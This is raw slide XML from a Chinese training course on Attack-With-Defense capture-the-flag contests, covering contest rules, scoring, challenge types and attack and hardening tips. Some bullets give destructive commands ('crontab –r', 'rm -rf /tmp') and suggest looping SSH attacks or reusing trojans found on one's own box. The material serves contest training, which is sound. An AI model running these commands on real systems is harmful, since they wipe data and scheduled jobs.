              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
              <a:tabLst>
                <a:tab pos="471170" algn="l"/>
                <a:tab pos="471805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查看自己靶机是否被植入木马，如果植入尝试利用。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4965" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1810"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/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使用ssh脚本尝试循环攻击。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4965" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1845"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/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定时清理定时任务： crontab –r (有权限)</a:t>
            </a:r>
            <a:endParaRPr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354965" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr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定时清理临时目录：rm -rf /tmp</a:t>
            </a:r>
            <a:endParaRPr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11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1684" y="653287"/>
            <a:ext cx="16338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总</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="9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结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1175" y="1699386"/>
            <a:ext cx="7817484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本次课程主要从四个部分来给大家介绍AWD。首先我们先了解AWD，之后我们 对AWD比赛的操作思路进行了一个梳理。分为加固与攻击进行了详细的介绍， 在我们最后一部分分析了一些脚本包括shell。</a:t>
            </a:r>
            <a:endParaRPr sz="18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5" y="592455"/>
            <a:ext cx="9429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12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" spc="-145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1473200"/>
            <a:ext cx="9225915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0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="11500" b="0" spc="-16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T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="11500" b="0" spc="-170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1500" b="0" spc="-25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11500" b="0" spc="-17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1500" b="0" spc="-27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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="11500" b="0" spc="-16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1500" b="0" spc="4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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="11500" b="0" spc="-17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1500" b="0" spc="-187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K	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="11500" b="0" spc="-213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Y </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="11500" b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11500" b="0" spc="-241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1500" b="0" spc="-21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U</a:t>
            </a:r>
            <a:endParaRPr sz="115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3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019" y="655192"/>
            <a:ext cx="2264410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比 赛 规 则 和 内</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="3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容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238" y="1302766"/>
            <a:ext cx="8712200" cy="458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61925" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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一般分配web服务器和pwn服务器（称：gamebox），多数为linux，在某处存在 flag(一般存放在根目录)；通常是一个GameBox就是一个题，一场比赛通常是2-3个  GameBox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469900" marR="255905" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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参赛选手需保证所有GameBox向外映射的所有端口正常开启，且提供的服务功能 正常。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尽快修复本团队GameBox上的漏洞，防止其他选手利用相关漏洞攻破GameBox获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取Flag。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尽可能多的获取其他选手GameBox上的Flag串并提交。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可能会提供一台流量分析的虚拟机，可以下载流量文件进行数据分析（较少提供）</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern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  <a:p>
            <a:pPr marL="469900" marR="233680" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Source Han Sans CN Normal" panose="020B0300000000000000" charset="-122"/>
                <a:ea typeface="Source Han Sans CN Normal" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="Source Han Sans CN Normal" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>比赛一般分为两个阶段，前期加固阶段，后期的攻防阶段（此时还可对自己靶机 进行加固操作）；</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Source Han Sans CN Normal" panose="020B0300000000000000" charset="-122"/>
              <a:ea typeface="Source Han Sans CN Normal" panose="020B0300000000000000" charset="-122"/>
              <a:cs typeface="Source Han Sans CN Normal" panose="020B03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1359" y="641857"/>
            <a:ext cx="2264410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比 赛 规 则 和 内</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="30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容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238" y="1302766"/>
            <a:ext cx="8630285" cy="36118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此比赛模式在线下独立局域网模式举行；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比赛前每个队伍有一个初始分值（比如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50000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分）。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marR="5080" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/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会在主办方的设定下每隔一定时间刷新一轮；在同一轮内，无法多次利用同一 对手的同一台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GameBox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上的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得分。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每个队伍的每台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GameBox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在同一轮中被对手成功获取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Flag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后会被扣分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裁判方会对所有选手靶机服务进行相关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check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，宕机扣分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(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有些比赛会把扣除的分值给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check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正常的队伍均分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)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每个队伍会分配一个低权限账户（非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root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）；</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern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Char char="➢"/>
              <a:tabLst>
                <a:tab pos="469265" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst>
            </a:pP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禁止对服务器平台进行攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>等，一经发现，终止比赛后果自负；</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:uFillTx/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7665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4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3594" y="637412"/>
            <a:ext cx="1933575" cy="56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题 目 类 型 分</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="425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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>析</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-12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075" y="1504802"/>
            <a:ext cx="5195570" cy="20878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175"/>
              </a:spcBef>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="469900" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst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语言</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>: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多数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-60" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>php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、少数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>java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3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站；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har char="➢"/>
              <a:tabLst>
                <a:tab pos="469900" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst>
            </a:pP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常见出题人自己写的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>cms</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100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800" spc="-5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>添加对应的漏洞点；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har char="➢"/>
              <a:tabLst>
                <a:tab pos="469900" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst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常见或不常见的一些</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>cms</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>，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网上均有</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-80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har char="➢"/>
              <a:tabLst>
                <a:tab pos="469900" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst>
            </a:pP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一些框架漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>(thinkphp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-145" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>MVC)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Font typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="469900" algn="l"/>
                <a:tab pos="469900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-90" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Pwn</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122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5543" y="580466"/>
            <a:ext cx="3003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5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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11723</Words>
  <Application>WPS 表格</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>878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4" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>方正书宋_GBK</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Heiti SC</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>汉仪书宋二KW</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Source Han Sans CN Normal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>思源黑体 CN</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>AWD之竞赛指南</vt:lpstr>
      <vt:lpstr>课程简介</vt:lpstr>
      <vt:lpstr>课程目录</vt:lpstr>
      <vt:lpstr>一、AWD的概念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课程目录</vt:lpstr>
      <vt:lpstr>二、AWD攻防之加固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课程目录</vt:lpstr>
      <vt:lpstr>三、AWD攻防之攻击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课程目录</vt:lpstr>
      <vt:lpstr>四、AWD攻防之脚本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 H A N K	Y O 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AWD之赛前培训</dc:title>
  <dc:creator>刘 思蜀</dc:creator>
  <cp:lastModifiedBy>txf</cp:lastModifiedBy>
  <cp:revision>104</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-28T02:19:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-28T02:19:28Z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2052-3.2.1.5071</vt:lpwstr>
  </property>
</Properties>
</file>